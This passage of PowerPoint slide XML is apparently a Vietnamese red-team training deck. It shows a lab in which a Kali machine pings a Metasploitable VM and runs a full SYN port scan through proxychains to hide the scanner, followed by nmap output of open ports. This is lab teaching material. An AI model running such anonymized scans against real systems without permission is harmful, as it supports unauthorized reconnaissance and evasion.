              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nâng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kỹ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>năng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>redteams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3202844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2D86B5-C0FB-44D3-AC0D-12268307E095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="99237"/>
            <a:ext cx="10515600" cy="6077726"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mở</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network = host-only adapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ping 192.168.56.102</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ping: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64 bytes from 192.168.56.102: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icmp_seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=64 time=10.7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> proxy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p- 192.168.56.102</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] config file found: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] preloading /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/lib/x86_64-linux-gnu/libproxychains.so.4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng 4.17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="786702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011EEA-9EC2-47E3-BCD7-863676924F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="127592"/>
            <a:ext cx="10515600" cy="6592186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 06:52 EDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RTTVAR has grown to over 2.3 seconds, decreasing to 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap scan report for 192.168.56.102</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host is up (0.0093s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not shown: 65505 closed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ports (reset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4057313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F16DC2-FC34-4383-922C-282189479EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="212651"/>
            <a:ext cx="8596668" cy="5828711"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>PORT      STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>21/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    open  ftp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>23/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    open  telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    open  smtp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>53/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    open  domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    open  http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>111/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>rpcbind</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>netbios-ssn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
